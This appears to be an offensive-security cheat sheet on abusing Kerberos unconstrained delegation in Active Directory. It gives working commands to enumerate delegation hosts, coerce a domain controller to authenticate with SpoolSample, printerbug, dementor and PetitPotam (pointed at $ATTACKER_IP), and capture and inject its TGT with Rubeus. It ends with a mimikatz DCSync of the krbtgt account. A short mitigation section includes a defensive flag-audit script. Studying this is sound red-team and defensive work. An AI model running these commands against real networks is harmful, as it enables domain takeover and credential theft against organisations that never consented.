Kerberos Delegation - Unconstrained Delegation

The user sends a ST to access the service, along with their TGT, and then the service can use the user's TGT to request a ST for the user to any other service and impersonate the user. - https://shenaniganslabs.io/2019/01/28/Wagging-the-Dog.html

When a user authenticates to a computer that has unconstrained Kerberos delegation enabled, the authenticated user's TGT is saved in that computer's memory.

⚠ Unconstrained delegation used to be the only option available in Windows 2000

⚠ Warning: Remember to coerce to a HOSTNAME if you want a Kerberos ticket.

SpoolService Abuse with Unconstrained Delegation

The goal is to gain DCSync privileges using a computer account and the SpoolService bug.

Requirements:

  • Object with the property "Trust this computer for delegation to any service (Kerberos only)"
  • Must have the ADS_UF_TRUSTED_FOR_DELEGATION flag
  • Must not have the ADS_UF_NOT_DELEGATED flag
  • User must not be in the Protected Users group
  • User must not have the flag "Account is sensitive and cannot be delegated"

Find delegation

⚠ Domain controllers usually have unconstrained delegation enabled.

Check the TRUSTED_FOR_DELEGATION property.

  • ADModule
    # From https://github.com/samratashok/ADModule
    PS> Get-ADComputer -Filter {TrustedForDelegation -eq $True}
    
  • bloodyAD

    bloodyAD -u user -p 'totoTOTOtoto1234*' -d crash.lab --host 10.100.10.5 get search --filter '(&(objectCategory=Computer)(userAccountControl:1.2.840.113556.1.4.803:=524288))' --attr sAMAccountName,userAccountControl
    

  • ldapdomaindump

    $> ldapdomaindump -u "DOMAIN\\Account" -p "Password123*" 10.10.10.10   
    grep TRUSTED_FOR_DELEGATION domain_computers.grep
    

  • netexec module

    nxc ldap 10.10.10.10 -u username -p password --trusted-for-delegation
    

  • BloodHound: MATCH (c:Computer {unconstraineddelegation:true}) RETURN c

  • Powershell Active Directory module: Get-ADComputer -LDAPFilter "(&(objectCategory=Computer)(userAccountControl:1.2.840.113556.1.4.803:=524288))" -Properties DNSHostName,userAccountControl

SpoolService status

Check if the spool service is running on the remote host

ls \\dc01\pipe\spoolss
python rpcdump.py DOMAIN/user:password@10.10.10.10

Monitor with Rubeus

Monitor incoming connections from Rubeus.

Rubeus.exe monitor /interval:1 

Force a connect back from the DC

Due to the unconstrained delegation, the TGT of the computer account (DC$) will be saved in the memory of the computer with unconstrained delegation. By default the domain controller computer account has DCSync rights over the domain object.

SpoolSample is a PoC to coerce a Windows host to authenticate to an arbitrary server using a "feature" in the MS-RPRN RPC interface.

# From https://github.com/leechristensen/SpoolSample
.\SpoolSample.exe VICTIM-DC-NAME UNCONSTRAINED-SERVER-DC-NAME
.\SpoolSample.exe DC01.HACKER.LAB HELPDESK.HACKER.LAB
# DC01.HACKER.LAB is the domain controller we want to compromise
# HELPDESK.HACKER.LAB is the machine with delegation enabled that we control.

# From https://github.com/dirkjanm/krbrelayx
printerbug.py 'domain/username:password'@<VICTIM-DC-NAME> <UNCONSTRAINED-SERVER-DC-NAME>

# From https://gist.github.com/3xocyte/cfaf8a34f76569a8251bde65fe69dccc#gistcomment-2773689
python dementor.py -d domain -u username -p password <UNCONSTRAINED-SERVER-DC-NAME> <VICTIM-DC-NAME>

If the attack worked you should get a TGT of the domain controller.

Load the ticket

Extract the base64 TGT from Rubeus output and load it to our current session.

.\Rubeus.exe asktgs /ticket:<ticket base64> /service:LDAP/dc.lab.local,cifs/dc.lab.local /ptt

Alternatively, you could also grab the ticket using Mimikatz: mimikatz # sekurlsa::tickets

Then you can use DCSync or another attack: mimikatz # lsadump::dcsync /user:HACKER\krbtgt

Mitigation

  • Ensure sensitive accounts cannot be delegated
  • Disable the Print Spooler Service
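
To audit the first mitigation against the Requirements list, the check below is an added example, not part of the original page or of any tool it cites. It takes sAMAccountName and userAccountControl values as the discovery queries return them; the sample records, the `Account` type and the `privileged` marker are constructed assumptions.

```python
# Added example: audit over constructed records, not real directory data.
from typing import NamedTuple

# userAccountControl bits (ADS_USER_FLAG_ENUM)
UF_ACCOUNTDISABLE = 0x2
UF_SERVER_TRUST_ACCOUNT = 0x2000      # domain controller computer account
UF_TRUSTED_FOR_DELEGATION = 0x80000   # 524288, the value in the LDAP filter above
UF_NOT_DELEGATED = 0x100000           # "Account is sensitive and cannot be delegated"


class Account(NamedTuple):
    sam: str                          # sAMAccountName
    uac: int                          # userAccountControl
    groups: frozenset = frozenset()   # resolved group names
    privileged: bool = False          # assumption: set by the caller for tier-0 accounts


def enabled(a: Account) -> bool:
    return not (a.uac & UF_ACCOUNTDISABLE)


def unconstrained_hosts(accounts):
    """Enabled accounts trusted for unconstrained delegation, DCs excluded."""
    return [a.sam for a in accounts
            if enabled(a)
            and a.uac & UF_TRUSTED_FOR_DELEGATION
            and not (a.uac & UF_SERVER_TRUST_ACCOUNT)]


def delegable_privileged(accounts):
    """Privileged accounts with neither protection from the Requirements list."""
    return [a.sam for a in accounts
            if a.privileged and enabled(a)
            and not (a.uac & UF_NOT_DELEGATED)
            and "Protected Users" not in a.groups]


SAMPLE = [  # constructed records
    Account("DC01$", 0x82000),                     # DC: expected to carry the flag
    Account("HELPDESK$", 0x81000),                 # member server, unconstrained
    Account("OLDSRV$", 0x81002),                   # same flag but disabled
    Account("WS01$", 0x1000),                      # plain workstation
    Account("da_alice", 0x200, privileged=True),   # no protection set
    Account("da_bob", 0x100200, privileged=True),  # NOT_DELEGATED set
    Account("da_carol", 0x200, frozenset({"Protected Users"}), True),
    Account("jdoe", 0x200),                        # ordinary user
]

if __name__ == "__main__":
    print("Unconstrained delegation (non-DC):", unconstrained_hosts(SAMPLE))
    print("Privileged and delegable:", delegable_privileged(SAMPLE))
```

Any account in the second list can have its TGT cached on any host in the first list once it authenticates there.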

MS-EFSRPC Abuse with Unconstrained Delegation

PetitPotam is another tool to coerce a callback from the targeted machine; it is used here instead of SpoolSample.

# Coerce the callback
git clone https://github.com/topotam/PetitPotam
python3 petitpotam.py -d $DOMAIN -u $USER -p $PASSWORD $ATTACKER_IP $TARGET_IP
python3 petitpotam.py -d '' -u '' -p '' $ATTACKER_IP $TARGET_IP

# Extract the ticket
.\Rubeus.exe asktgs /ticket:<ticket base64> /ptt
